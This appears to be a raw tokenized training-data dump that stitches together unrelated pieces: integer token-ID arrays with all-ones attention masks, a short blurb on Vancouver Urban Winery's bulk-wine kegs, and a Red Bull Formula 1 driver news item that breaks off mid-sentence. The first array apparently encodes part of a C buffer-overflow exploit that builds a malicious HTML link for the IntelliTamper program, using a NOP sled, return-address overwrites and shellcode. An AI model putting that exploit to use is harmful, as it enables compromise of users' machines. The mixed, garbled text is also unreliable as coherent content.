29941, 29905, 21791, 29906, 29908, 13, 29871, 6634, 29916, 29947, 29946, 29905, 29916, 29929, 29890, 29905, 29916, 29946, 29945, 29905, 29916, 29896, 29941, 29905, 29916, 29929, 29883, 29905, 29916, 29896, 29941, 29905, 29916, 29929, 29890, 29905, 29916, 29945, 29881, 29905, 29916, 29955, 29941, 29905, 29916, 29929, 29874, 29905, 29916, 370, 29905, 29916, 29945, 29947, 29905, 29916, 29896, 29941, 29905, 29916, 29946, 29881, 29905, 21791, 29955, 29905, 21791, 29953, 29908, 13, 29871, 6634, 21791, 29945, 29905, 21791, 29941, 29905, 29916, 29945, 29874, 29905, 29916, 29929, 29883, 29905, 29916, 29929, 29947, 1769, 13, 13, 29871, 289, 7310, 890, 13, 13, 29871, 565, 29898, 1191, 29883, 19216, 29946, 29897, 13, 1678, 5877, 29898, 19218, 29961, 29900, 5691, 13, 13, 29871, 2011, 29922, 1219, 29875, 29898, 19218, 29961, 29941, 5691, 13, 29871, 565, 29898, 637, 14065, 29900, 8876, 637, 29958, 29953, 29945, 29945, 29941, 29945, 29897, 426, 13, 1678, 7571, 703, 2704, 29901, 529, 637, 29958, 1818, 367, 1546, 29871, 29896, 322, 29871, 29953, 29945, 29945, 29941, 29945, 29905, 29878, 29905, 29876, 1496, 13, 1678, 736, 448, 29896, 29936, 13, 29871, 500, 13, 29871, 7571, 703, 29961, 29903, 29962, 10377, 29901, 1273, 29879, 2011, 29901, 1273, 29881, 934, 29901, 1273, 29879, 29905, 29878, 29905, 29876, 613, 19218, 29961, 29906, 1402, 637, 29892, 19218, 29961, 29896, 5691, 13, 29871, 7571, 703, 29961, 29907, 29962, 21605, 15968, 1273, 29899, 29941, 29929, 29879, 2023, 3284, 15903, 401, 1496, 13, 29871, 565, 29898, 842, 29918, 1557, 29898, 19218, 29961, 29906, 1402, 637, 29892, 15903, 29883, 29900, 311, 876, 13, 1678, 736, 448, 29896, 29936, 13, 29871, 7571, 703, 29928, 12413, 29905, 29878, 29905, 29876, 1496, 13, 29871, 934, 29922, 29888, 3150, 29898, 19218, 29961, 29896, 1402, 29908, 29893, 1496, 13, 29871, 565, 11864, 1445, 29897, 426, 13, 1678, 7571, 703, 2704, 29901, 9368, 304, 1722, 1273, 29879, 29905, 29878, 29905, 29876, 613, 19218, 29961, 29896, 5691, 13, 1678, 736, 448, 29896, 29936, 13, 29871, 500, 13, 29871, 7571, 703, 29961, 29907, 29962, 28676, 15709, 1544, 363, 3159, 514, 277, 314, 546, 1273, 29899, 29906, 29900, 29879, 2023, 3284, 29894, 29906, 29889, 29900, 29955, 1496, 13, 29871, 285, 8124, 29898, 1445, 29892, 29933, 17958, 416, 13, 29871, 285, 8124, 29898, 1445, 1699, 14167, 5883, 3174, 322, 7679, 29915, 29876, 29915, 1245, 29966, 15176, 14247, 29878, 29905, 29876, 1496, 13, 13, 29871, 2626, 842, 29898, 9040, 29892, 29900, 29916, 29929, 29900, 29892, 17921, 29898, 9040, 2483, 13, 29871, 334, 29898, 15395, 1472, 7528, 29987, 9040, 29961, 1525, 29911, 29918, 24815, 29906, 29962, 353, 28081, 29918, 3035, 8353, 29906, 29936, 13, 29871, 2626, 23141, 29898, 9040, 29974, 29903, 3217, 4198, 10490, 29906, 29892, 15903, 29883, 29900, 311, 29892, 17921, 29898, 15903, 29883, 29900, 311, 6817, 29896, 416, 13, 29871, 2626, 23141, 29898, 9040, 29974, 29953, 29947, 29941, 29953, 29899, 29947, 1699, 29905, 29916, 25752, 29905, 29916, 29923, 29900, 613, 29906, 416, 4949, 432, 1526, 395, 448, 29871, 29900, 29916, 29896, 29900, 3776, 13, 29871, 2626, 23141, 29898, 9040, 29974, 29953, 29947, 29941, 29953, 29899, 29896, 29953, 1699, 29905, 29916, 29923, 29929, 29905, 29916, 29947, 29943, 29905, 29916, 29923, 29945, 29905, 29916, 4198, 29905, 29916, 4198, 613, 29945, 416, 4949, 432, 1526, 395, 448, 1577, 8773, 3776, 13, 13, 29871, 285, 8124, 29898, 1445, 1699, 29966, 29909, 379, 25866, 14672, 1496, 13, 29871, 285, 8124, 29898, 1445, 29892, 9040, 416, 13, 29871, 285, 8124, 29898, 1445, 1699, 29905, 1013, 344, 3594, 289, 2335, 829, 29909, 5299, 15176, 14247, 29878, 29905, 29876, 1496, 13, 29871, 7571, 703, 29928, 12413, 29905, 29878, 29905, 29876, 1496, 13, 13, 29871, 7571, 703, 29961, 29907, 29962, 28676, 15709, 1544, 363, 3159, 514, 277, 314, 546, 1273, 29899, 29906, 29900, 29879, 2023, 3284, 29894, 29906, 29889, 29900, 29947, 350, 1187, 29871, 29946, 1496, 13, 29871, 2626, 842, 29898, 9040, 29892, 29900, 29916, 29929, 29900, 29892, 17921, 29898, 9040, 2483, 13, 29871, 334, 29898, 15395, 1472, 7528, 29987, 9040, 29961, 1525, 29911, 29918, 24815, 29962, 353, 28081, 29918, 3035, 8353, 29936, 13, 29871, 2626, 23141, 29898, 9040, 29974, 29903, 3217, 4198, 10490, 29892, 15903, 29883, 29900, 311, 29892, 17921, 29898, 15903, 29883, 29900, 311, 6817, 29896, 416, 13, 29871, 2626, 23141, 29898, 9040, 29974, 14226, 9800, 29899, 29947, 1699, 29905, 29916, 25752, 29905, 29916, 29923, 29900, 613, 29906, 416, 4949, 432, 1526, 395, 448, 29871, 29900, 29916, 29896, 29900, 3776, 13, 29871, 2626, 23141, 29898, 9040, 29974, 14226, 9800, 29899, 29896, 29953, 1699, 29905, 29916, 29923, 29929, 29905, 29916, 29947, 29943, 29905, 29916, 25752, 29905, 29916, 4198, 29905, 29916, 4198, 613, 29945, 416, 4949, 432, 1526, 395, 448, 1577, 8773, 3776, 13, 13, 29871, 285, 8124, 29898, 1445, 1699, 29966, 29909, 379, 25866, 14672, 1496, 13, 29871, 285, 8124, 29898, 1445, 29892, 9040, 416, 13, 29871, 285, 8124, 29898, 1445, 1699, 29905, 1013, 1333, 409, 3594, 289, 2335, 829, 29909, 5299, 15176, 14247, 29878, 29905, 29876, 1496, 13, 29871, 7571, 703, 29928, 12413, 29905, 29878, 29905, 29876, 1496, 13, 13, 29871, 285, 8124, 29898, 1445, 29892, 11794, 416, 13, 29871, 285, 5358, 29898, 1445, 416, 13, 29871, 7571, 703, 29961, 29907, 29962, 2178, 4982, 2309, 29905, 29878, 29905, 29876, 1496, 13, 29871, 736, 29871, 29900, 29936, 13, 29913, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
The founders of Vancouver Urban Winery, a cool multi-function space with a tasting bar introduced a new idea to Vancouver earlier this year - importing good wines in bulk and packaging them locally. First, they put wines in kegs for a wine-on-tap trade they started.
[ 1, 450, 1476, 414, 310, 478, 29711, 22589, 8892, 708, 29892, 263, 12528, 2473, 29899, 2220, 2913, 411, 263, 260, 579, 292, 2594, 9129, 263, 716, 2969, 304, 478, 29711, 8859, 445, 1629, 448, 28348, 1781, 281, 1475, 297, 21610, 322, 4870, 6751, 963, 12430, 29889, 3824, 29892, 896, 1925, 281, 1475, 297, 413, 387, 29879, 363, 263, 19006, 29899, 265, 29899, 29873, 481, 11302, 896, 4687, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Last updated on .From the section Formula 1 Twenty one-year-old Russian Kvyat's highest finish is second Red Bull say they will retain their driver line-up of Daniel Ricciardo and Daniil Kvyat next season - as long as the team is on the grid. Ricciardo has a contract until the end of 2018 but there have been doubts about the future of Kvyat after an up-and-down first season with the team. Team principal Christian Horner said: "Ricciardo's contract is fixed and all the options are on our side with Kvyat. Daniil Kvyat: Formula 1's book worm "He's doing great. So long as we're here, he'll be in the car next year." Horner's comments seem to end speculation that Toro Rosso's Max Verstappen might be promoted to the senior team after an impressive debut season for the 18-year-old Dutchman. Red Bull's participation is still in doubt because they have not yet confirmed whether they have an engine for 2016. The team were last month close to concluding negotiations to terminate their contract with Renault a year early due to growing tensions between the two. But those talks stopped when it became clear Mercedes would not supply Red Bull and Ferrari said they could not supply them their 2016 engine next season. Insiders say that Red Bull are now likely to continue with Renault but with the engine given a different name so it does not appear to casual audience as if the relationship has continued. Renault are on the verge of taking control of the Lotus team and returning as a team owner and constructor. However, Horner suggested there was still another possibility for Red Bull: "There may be something else. We'll see." Red Bull have had talks with Honda about a supply, but works partner McLaren's chairman Ron Dennis 